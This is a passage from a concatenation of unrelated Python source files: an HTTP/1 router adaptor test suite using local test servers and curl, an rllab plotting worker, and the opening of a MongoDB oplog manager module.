Verify credit is replenished by sending > the default credit window
requests across the routers. The default credit window is 250
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_02_credit_replenish",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "24",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_02_credit_replenish'),
ResponseValidator(status=200),
),
]
}
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=300)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(300, client.count)
server.wait()
def test_03_server_reconnect(self):
"""
Verify server reconnect logic.
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_03_server_reconnect",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "24",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_03_server_reconnect'),
ResponseValidator(status=200),
),
]
}
# bring up the server and send some requests. This will cause the
# router to grant credit for clients
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=2)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(2, client.count)
# simulate server loss. Fire up a client which should be granted
# credit since the adaptor does not immediately teardown the server
# links. This will cause the adaptor to run qdr_connection_process
# without a raw connection available to wake the I/O thread..
server.wait()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=2)
# the adaptor will detach the links to the server if the connection
# cannot be reestablished after 2.5 seconds. Restart the server before
# that occurrs to prevent client messages from being released with 503
# status.
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(2, client.count)
server.wait()
def test_04_server_pining_for_the_fjords(self):
"""
Test permanent loss of server
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_04_fjord_pining",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "20",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_04_fjord_pining'),
ResponseValidator(status=200),
),
]
}
# bring up the server and send some requests. This will cause the
# router to grant credit for clients
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
TESTS_FAIL = {
"GET": [
(RequestMsg("GET", "/GET/test_04_fjord_pining",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "20",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_04_fjord_pining'),
ResponseValidator(status=503),
),
]
}
# Kill the server then issue client requests. These requests will be
# held on the server's outgoing links until they expire (2.5 seconds).
# At that point the client will receive a 503 response.
server.wait()
client = ThreadedTestClient(TESTS_FAIL, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
# ensure links recover once the server re-appears
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
server.wait()
def test_05_large_streaming_msg(self):
"""
Verify large streaming message transfer
"""
TESTS_11 = {
"PUT": [
(RequestMsg("PUT", "/PUT/streaming_test_11",
headers={
"Transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# 4 chunks each ~= 600K
body=b'927C1\r\n' + b'0' * 0x927C0 + b'X\r\n'
+ b'927C0\r\n' + b'1' * 0x927C0 + b'\r\n'
+ b'927C1\r\n' + b'2' * 0x927C0 + b'X\r\n'
+ b'927C0\r\n' + b'3' * 0x927C0 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "data",
"Content-Length": "0"}),
ResponseValidator(status=201))
],
"GET": [
(RequestMsg("GET", "/GET/streaming_test_11",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# two 1.2MB chunk
body=b'124f80\r\n' + b'4' * 0x124F80 + b'\r\n'
+ b'124f80\r\n' + b'5' * 0x124F80 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseValidator(status=200))
],
}
TESTS_10 = {
"POST": [
(RequestMsg("POST", "/POST/streaming_test_10",
headers={"Header-1": "H" * 2048,
"Content-Length": "2097155",
"Content-Type": "text/plain;charset=utf-8"},
body=b'P' * 2097155),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "data",
"Content-Length": "0"}),
ResponseValidator(status=201))
],
"GET": [
(RequestMsg("GET", "/GET/streaming_test_10",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "1999999",
"Content-Type": "text/plain;charset=utf-8"},
body=b'G' * 1999999),
ResponseValidator(status=200))
],
}
server11 = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS_11)
self.assertIsNotNone(server11, TEST_SERVER_ERROR % self.http_server11_port)
server10 = TestServer.new_server(self.http_server10_port, self.http_listener10_port, TESTS_10,
handler_cls=RequestHandler10)
self.assertIsNotNone(server10, TEST_SERVER_ERROR % self.http_server10_port)
self.EA2.wait_connectors()
client11 = ThreadedTestClient(TESTS_11,
self.http_listener11_port,
repeat=2)
client11.wait()
self.assertIsNone(client11.error)
self.assertEqual(4, client11.count)
client10 = ThreadedTestClient(TESTS_10,
self.http_listener10_port,
repeat=2)
client10.wait()
self.assertIsNone(client10.error)
self.assertEqual(4, client10.count)
server11.wait()
server10.wait()
class CommonHttp1OneRouterTest(object):
TESTS_11 = {
#
# GET
#
"GET": [
(RequestMsg("GET", "/GET/error",
headers={"Content-Length": 0}),
ResponseMsg(400, reason="Bad breath", error=True),
ResponseValidator(status=400)),
(RequestMsg("GET", "/GET/no_content",
headers={"Content-Length": 0}),
ResponseMsg(204, reason="No Content"),
ResponseValidator(status=204)),
(RequestMsg("GET", "/GET/content_len",
headers={"Content-Length": "00"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 1,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?'),
ResponseValidator(expect_headers={'Content-Length': '1'},
expect_body=b'?')),
(RequestMsg("GET", "/GET/content_len_511",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 511,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 511),
ResponseValidator(expect_headers={'Content-Length': '511'},
expect_body=b'X' * 511)),
(RequestMsg("GET", "/GET/content_len_4096",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 4096,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 4096),
ResponseValidator(expect_headers={'Content-Length': '4096'},
expect_body=b'X' * 4096)),
(RequestMsg("GET", "/GET/chunked",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
# note: the chunk length does not count the trailing CRLF
body=b'16\r\n'
+ b'Mary had a little pug \r\n'
+ b'1b\r\n'
+ b'Its name was "Skupper-Jack"\r\n'
+ b'0\r\n'
+ b'Optional: Trailer\r\n'
+ b'Optional: Trailer\r\n'
+ b'\r\n'),
ResponseValidator(expect_headers={'transfer-encoding': 'chunked'},
expect_body=b'Mary had a little pug Its name was "Skupper-Jack"')),
(RequestMsg("GET", "/GET/chunked_large",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
# note: the chunk length does not count the trailing CRLF
body=b'1\r\n'
+ b'?\r\n'
+ b'800\r\n'
+ b'X' * 0x800 + b'\r\n'
+ b'13\r\n'
+ b'Y' * 0x13 + b'\r\n'
+ b'0\r\n'
+ b'Optional: Trailer\r\n'
+ b'Optional: Trailer\r\n'
+ b'\r\n'),
ResponseValidator(expect_headers={'transfer-encoding': 'chunked'},
expect_body=b'?' + b'X' * 0x800 + b'Y' * 0x13)),
(RequestMsg("GET", "/GET/info_content_len",
headers={"Content-Length": 0}),
[ResponseMsg(100, reason="Continue",
headers={"Blab": 1, "Blob": "?"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 1,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?')],
ResponseValidator(expect_headers={'Content-Type': "text/plain;charset=utf-8"},
expect_body=b'?')),
# (RequestMsg("GET", "/GET/no_length",
# headers={"Content-Length": "0"}),
# ResponseMsg(200, reason="OK",
# headers={"Content-Type": "text/plain;charset=utf-8",
# "connection": "close"
# },
# body=b'Hi! ' * 1024 + b'X'),
# ResponseValidator(expect_body=b'Hi! ' * 1024 + b'X')),
],
#
# HEAD
#
"HEAD": [
(RequestMsg("HEAD", "/HEAD/test_01",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"})
),
(RequestMsg("HEAD", "/HEAD/test_02",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"App-Header-2": "Value 02"}),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"App-Header-2": "Value 02"})),
(RequestMsg("HEAD", "/HEAD/test_03",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-3": "Value 03"}),
ResponseValidator(expect_headers={"App-Header-3": "Value 03"})),
],
#
# POST
#
"POST": [
(RequestMsg("POST", "/POST/test_01",
headers={"App-Header-1": "Value 01",
"Content-Length": "19",
"Content-Type": "application/x-www-form-urlencoded"},
body=b'one=1&two=2&three=3'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Transfer-Encoding": "chunked"},
body=b'8\r\n'
+ b'12345678\r\n'
+ b'f\r\n'
+ b'abcdefghijklmno\r\n'
+ b'000\r\n'
+ b'\r\n'),
ResponseValidator(expect_body=b'12345678abcdefghijklmno')
),
(RequestMsg("POST", "/POST/test_02",
headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked"},
body=b'01\r\n'
+ b'!\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Content-Length": "9"},
body=b'Hi There!'),
ResponseValidator(expect_body=b'Hi There!')
),
],
#
# PUT
#
"PUT": [
(RequestMsg("PUT", "/PUT/test_01",
headers={"Put-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
body=b'80\r\n'
+ b'$' * 0x80 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Content-length": "3"},
body=b'ABC'),
ResponseValidator(status=201, expect_body=b'ABC')
),
(RequestMsg("PUT", "/PUT/test_02",
headers={"Put-Header-1": "Value 01",
"Content-length": "0",
"Content-Type": "text/plain;charset=utf-8"}),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Transfer-Encoding": "chunked"},
body=b'1\r\n$\r\n0\r\n\r\n'),
ResponseValidator(status=201, expect_body=b'$')
),
]
}
# HTTP/1.0 compliant test cases (no chunked, response length unspecified)
TESTS_10 = {
#
# GET
#
"GET": [
(RequestMsg("GET", "/GET/error",
headers={"Content-Length": 0}),
ResponseMsg(400, reason="Bad breath", error=True),
ResponseValidator(status=400)),
(RequestMsg("GET", "/GET/no_content",
headers={"Content-Length": 0}),
ResponseMsg(204, reason="No Content"),
ResponseValidator(status=204)),
(RequestMsg("GET", "/GET/content_len_511",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 511,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 511),
ResponseValidator(expect_headers={'Content-Length': '511'},
expect_body=b'X' * 511)),
(RequestMsg("GET", "/GET/content_len_4096",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 4096),
ResponseValidator(expect_headers={"Content-Type": "text/plain;charset=utf-8"},
expect_body=b'X' * 4096)),
(RequestMsg("GET", "/GET/info_content_len",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8"},
body=b'?'),
ResponseValidator(expect_headers={'Content-Type': "text/plain;charset=utf-8"},
expect_body=b'?')),
# test support for "folded headers"
(RequestMsg("GET", "/GET/folded_header_01",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": 1,
"folded-header": "One\r\n \r\n\tTwo"},
body=b'X'),
ResponseValidator(expect_headers={"Content-Type":
"text/plain;charset=utf-8",
"folded-header":
"One \tTwo"},
expect_body=b'X')),
(RequestMsg("GET", "/GET/folded_header_02",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": 1,
"folded-header": "\r\n \r\n\tTwo",
"another-header": "three"},
body=b'X'),
ResponseValidator(expect_headers={"Content-Type":
"text/plain;charset=utf-8",
# trim leading and
# trailing ws:
"folded-header":
"Two",
"another-header":
"three"},
expect_body=b'X')),
],
#
# HEAD
#
"HEAD": [
(RequestMsg("HEAD", "/HEAD/test_01",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"})
),
(RequestMsg("HEAD", "/HEAD/test_03",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-3": "Value 03"}),
ResponseValidator(expect_headers={"App-Header-3": "Value 03"})),
],
#
# POST
#
"POST": [
(RequestMsg("POST", "/POST/test_01",
headers={"App-Header-1": "Value 01",
"Content-Length": "19",
"Content-Type": "application/x-www-form-urlencoded"},
body=b'one=1&two=2&three=3'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever"},
body=b'12345678abcdefghijklmno'),
ResponseValidator(expect_body=b'12345678abcdefghijklmno')
),
(RequestMsg("POST", "/POST/test_02",
headers={"App-Header-1": "Value 01",
"Content-Length": "5"},
body=b'01234'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Content-Length": "9"},
body=b'Hi There!'),
ResponseValidator(expect_body=b'Hi There!')
),
],
#
# PUT
#
"PUT": [
(RequestMsg("PUT", "/PUT/test_01",
headers={"Put-Header-1": "Value 01",
"Content-Length": "513",
"Content-Type": "text/plain;charset=utf-8"},
body=b'$' * 513),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Content-length": "3"},
body=b'ABC'),
ResponseValidator(status=201, expect_body=b'ABC')
),
(RequestMsg("PUT", "/PUT/test_02",
headers={"Put-Header-1": "Value 01",
"Content-length": "0",
"Content-Type": "text/plain;charset=utf-8"}),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever"},
body=b'No Content Length'),
ResponseValidator(status=201, expect_body=b'No Content Length')
),
]
}
def _do_request(self, client, tests):
for req, _, val in tests:
req.send_request(client)
rsp = client.getresponse()
try:
body = val.check_response(rsp)
except Exception as exc:
self.fail("request failed: %s" % str(exc))
if req.method == "BODY":
self.assertEqual(b'', body)
def test_001_get(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["GET"])
client.close()
def test_002_head(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["HEAD"])
client.close()
def test_003_post(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["POST"])
client.close()
def test_004_put(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["PUT"])
client.close()
def test_006_head_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["HEAD"])
client.close()
def test_007_post_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["POST"])
client.close()
def test_008_put_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["PUT"])
client.close()
class Http1OneRouterTestBase(TestCase):
# HTTP/1.1 compliant test cases
@classmethod
def router(cls, name, mode, extra):
config = [
('router', {'mode': mode,
'id': name,
'allowUnsettledMulticast': 'yes'}),
('listener', {'role': 'normal',
'port': cls.tester.get_port()}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address',
{'prefix': 'multicast', 'distribution': 'multicast'}),
]
if extra:
config.extend(extra)
config = Qdrouterd.Config(config)
cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))
return cls.routers[-1]
@classmethod
def setUpClass(cls):
"""Start a router"""
super(Http1OneRouterTestBase, cls).setUpClass()
cls.http_server11_port = cls.tester.get_port()
cls.http_server10_port = cls.tester.get_port()
cls.http_listener11_port = cls.tester.get_port()
cls.http_listener10_port = cls.tester.get_port()
class Http1Edge2EdgeTestBase(TestCase):
@classmethod
def router(cls, name, mode, extra):
config = [
('router', {'mode': mode,
'id': name,
'allowUnsettledMulticast': 'yes'}),
('listener', {'role': 'normal',
'port': cls.tester.get_port()}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address', {'prefix': 'multicast', 'distribution': 'multicast'}),
]
if extra:
config.extend(extra)
config = Qdrouterd.Config(config)
cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))
return cls.routers[-1]
@classmethod
def setUpClass(cls):
"""Start a router"""
super(Http1Edge2EdgeTestBase, cls).setUpClass()
cls.routers = []
cls.INTA_edge1_port = cls.tester.get_port()
cls.INTA_edge2_port = cls.tester.get_port()
cls.http_server11_port = cls.tester.get_port()
cls.http_listener11_port = cls.tester.get_port()
cls.http_server10_port = cls.tester.get_port()
cls.http_listener10_port = cls.tester.get_port()
class Http1ClientCloseTestsMixIn(object):
"""
Generic test functions for simulating HTTP/1.x client connection drops.
"""
def client_request_close_test(self, server_port, client_port, server_mgmt):
"""
Simulate an HTTP client drop while sending a very large PUT request
"""
PING = {
"GET": [
(RequestMsg("GET", "/GET/test_04_client_request_close/ping",
headers={"Content-Length": "0"}),
ResponseMsg(200, reason="OK",
headers={
"Content-Length": "19",
"Content-Type": "text/plain;charset=utf-8",
},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)
)]
}
TESTS = {
"PUT": [
(RequestMsg("PUT", "/PUT/test_04_client_request_close",
headers={
"Content-Length": "500000",
"Content-Type": "text/plain;charset=utf-8"
},
body=b'4' * (500000 - 19) + b'END OF TRANSMISSION'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/PUT/test_04_client_request_close",
"Content-Length": "0"}),
ResponseValidator(status=201)
)]
}
TESTS.update(PING)
server = TestServer(server_port=server_port,
client_port=client_port,
tests=TESTS)
#
# ensure the server has fully connected
#
client = ThreadedTestClient(PING, client_port)
client.wait()
#
# Simulate an HTTP client that dies during the sending of the PUT
# request
#
fake_request = b'PUT /PUT/test_04_client_request_close HTTP/1.1\r\n' \
+ b'Content-Length: 500000\r\n' \
+ b'Content-Type: text/plain;charset=utf-8\r\n' \
+ b'\r\n' \
+ b'?' * 50000
fake_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fake_client.settimeout(5)
fake_client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
fake_client.connect(("127.0.0.1", client_port))
fake_client.sendall(fake_request, socket.MSG_WAITALL)
fake_client.close()
# since socket I/O is asynchronous wait until the request arrives
# at the server
expected = len(fake_request)
bytes_in = 0
while expected > bytes_in:
ri = server_mgmt.query(type="org.apache.qpid.dispatch.httpRequestInfo").get_entities()
bytes_in = ri[-1]['bytesIn'] if ri else 0 # most recent request at tail
sleep(0.1)
# now ensure the connection between the router and the HTTP server
# still functions:
client = ThreadedTestClient(PING, client_port)
client.wait()
server.wait()
def client_response_close_test(self, server_port, client_port):
"""
Simulate an HTTP client drop while the server is sending a very large
response message.
"""
PING = {
"PUT": [
(RequestMsg("PUT", "/PUT/test_05_client_response_close/ping",
headers={"Content-Length": "1",
"content-type":
"text/plain;charset=utf-8"},
body=b'X'),
ResponseMsg(201, reason="Created",
headers={"Content-Length": "0"}),
ResponseValidator(status=201)
)]
}
big_headers = dict([('Huge%s' % i, chr(ord(b'0') + i) * 8000)
for i in range(10)])
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_05_client_response_close",
headers={
"Content-Length": "0",
"Content-Type": "text/plain;charset=utf-8"
}),
[ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(200,
reason="OK",
headers={"Content-Length": 1000000,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?' * 1000000)],
ResponseValidator(status=200)
)]
}
TESTS.update(PING)
server = TestServer(server_port=server_port,
client_port=client_port,
tests=TESTS)
#
# ensure the server has fully connected
#
client = ThreadedTestClient(PING, client_port)
client.wait()
#
# Simulate an HTTP client that dies during the receipt of the
# response
#
fake_request = b'GET /GET/test_05_client_response_close HTTP/1.1\r\n' \
+ b'Content-Length: 0\r\n' \
+ b'Content-Type: text/plain;charset=utf-8\r\n' \
+ b'\r\n'
fake_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fake_client.settimeout(TIMEOUT)
fake_client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
fake_client.connect(("127.0.0.1", client_port))
fake_client.sendall(fake_request, socket.MSG_WAITALL)
fake_client.recv(1)
fake_client.close()
#
# Verify the server is still reachable
#
client = ThreadedTestClient(PING, client_port)
client.wait()
server.wait()
class Http1CurlTestsMixIn(object):
"""
Test cases using curl as the command line client
"""
@unittest.skipIf(not _curl_ok(),
"required curl version >= %s" % str(CURL_VERSION))
def curl_get_test(self, host, port, server_port):
"""
Use curl to get a resource
"""
CURL_TESTS = {
"GET": [
(RequestMsg("GET", "/GET/curl_get"),
ResponseMsg(200, reason="OK",
headers={
"Content-Length": "19",
"Content-Type": "text/plain;charset=utf-8",
"Test-Header": "/GET/curl_get"
},
body=b'END OF TRANSMISSION'),
ResponseValidator())
],
"HEAD": [
(RequestMsg("HEAD", "/HEAD/curl_head",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator())
]
}
server = TestServer.new_server(server_port, port, CURL_TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % server_port)
get_url = "http://%s:%s/GET/curl_get" % (host, port)
head_url = "http://%s:%s/HEAD/curl_head" % (host, port)
status, out, err = run_curl(["--http1.1", "-G", get_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("END OF TRANSMISSION", out, "Unexpected out=%s (err=%s)"
% (out, err))
status, out, err = run_curl(["--http1.1", "-I", head_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("App-Header-2", out, "Unexpected out=%s (err=%s)"
% (out, err))
status, out, err = run_curl(["--http1.0", "-G", get_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("END OF TRANSMISSION", out, "Unexpected out=%s (err=%s)"
% (out, err))
status, out, err = run_curl(["--http1.1", "-G", get_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("END OF TRANSMISSION", out, "Unexpected out=%s (err=%s)"
% (out, err))
server.wait()
@unittest.skipIf(not _curl_ok(),
"required curl version >= %s" % str(CURL_VERSION))
def curl_put_test(self, host, port, server_port):
"""
Use curl to PUT a resource
"""
CURL_TESTS = {
"PUT": [
(RequestMsg("PUT", "/PUT/curl_put"),
ResponseMsg(201, reason="Created",
headers={
"Test-Header": "/PUT/curl_put",
"content-length": "0"
}),
ResponseValidator())
],
"HEAD": [
(RequestMsg("HEAD", "/HEAD/curl_head",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator())
]
}
server = TestServer.new_server(server_port, port, CURL_TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % server_port)
put_url = "http://%s:%s/PUT/curl_put" % (host, port)
head_url = "http://%s:%s/HEAD/curl_head" % (host, port)
status, out, err = run_curl(["--http1.1", "-T", ".", put_url],
input="Mary had a little pug."
"\nIts fleece was brown as dirt."
"\nIts color made Mary shrug."
"\nShe should dress it in a shirt.")
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
status, out, err = run_curl(["--http1.1", "-I", head_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("App-Header-2", out, "Unexpected out=%s (err=%s)"
% (out, err))
status, out, err = run_curl(["--http1.1", "-T", ".", put_url],
input="Ph'nglui mglw'nafh Cthulhu"
"\nR'lyeh wgah'nagl fhtagn")
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
server.wait()
@unittest.skipIf(not _curl_ok(),
"required curl version >= %s" % str(CURL_VERSION))
def curl_post_test(self, host, port, server_port):
"""
Use curl to post to a resource
"""
CURL_TESTS = {
"POST": [
(RequestMsg("POST", "/POST/curl_post"),
ResponseMsg(201, reason="Created",
headers={
"Test-Header": "/POST/curl_put",
"content-length": "19",
"Content-Type": "text/plain;charset=utf-8",
},
body=b'END OF TRANSMISSION'),
ResponseValidator())
],
"GET": [
(RequestMsg("GET", "/GET/curl_get",
headers={"Content-Length": "0"}),
ResponseMsg(200, reason="OK",
headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=b'0123456789'),
ResponseValidator())
]
}
server = TestServer.new_server(server_port, port, CURL_TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % server_port)
post_url = "http://%s:%s/POST/curl_post" % (host, port)
get_url = "http://%s:%s/GET/curl_get" % (host, port)
status, out, err = run_curl(["--http1.1", "-F", "name=Skupper",
"-F", "breed=Pug", post_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("END OF TRANSMISSION", out, "Unexpected out=%s (err=%s)"
% (out, err))
status, out, err = run_curl(["--http1.1", "-G", get_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("0123456789", out, "Unexpected out=%s (err=%s)"
% (out, err))
status, out, err = run_curl(["--http1.1", "-F", "name=Coco",
"-F", "breed=French Bulldog",
post_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("END OF TRANSMISSION", out, "Unexpected out=%s (err=%s)"
% (out, err))
server.wait()
|
plotter.py
|
import atexit
import sys
if sys.version_info[0] == 2:
from Queue import Empty
else:
from queue import Empty
from multiprocessing import Process, Queue
from rllab.sampler.utils import rollout
import numpy as np
__all__ = [
'init_worker',
'init_plot',
'update_plot'
]
process = None
queue = None
def _worker_start():
env = None
policy = None
max_length = None
try:
while True:
msgs = {}
# Only fetch the last message of each type
while True:
try:
msg = queue.get_nowait()
msgs[msg[0]] = msg[1:]
except Empty:
break
if 'stop' in msgs:
break
elif 'update' in msgs:
env, policy = msgs['update']
# env.start_viewer()
elif 'demo' in msgs:
param_values, max_length = msgs['demo']
policy.set_param_values(param_values)
rollout(env, policy, max_path_length=max_length, animated=True, speedup=5)
else:
if max_length:
rollout(env, policy, max_path_length=max_length, animated=True, speedup=5)
except KeyboardInterrupt:
pass
def _shutdown_worker():
if process:
queue.put(['stop'])
queue.close()
process.join()
def init_worker():
print("####################init_worker")
global process, queue
queue = Queue()
process = Process(target=_worker_start)
process.start()
atexit.register(_shutdown_worker)
def init_plot(env, policy):
queue.put(['update', env, policy])
def update_plot(policy, max_length=np.inf):
queue.put(['demo', policy.get_param_values(), max_length])
|
oplog_manager.py
|
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tails the oplog of a shard and returns entries
"""
import bson
import logging
try:
import Queue as queue
except ImportError:
import queue
import sys
import time
import threading
import pymongo
from pymongo import CursorType
from mongo_connector import errors, util
from mongo_connector.constants import DEFAULT_BATCH_SIZE
from mongo_connector.gridfs_file import GridFSFile
from mongo_connector.util import log_fatal_exceptions, retry_until_ok
LOG = logging.getLogger(__name__)
class ReplicationLagLogger(threading.Thread):
"""Thread that periodically logs the current replication lag.
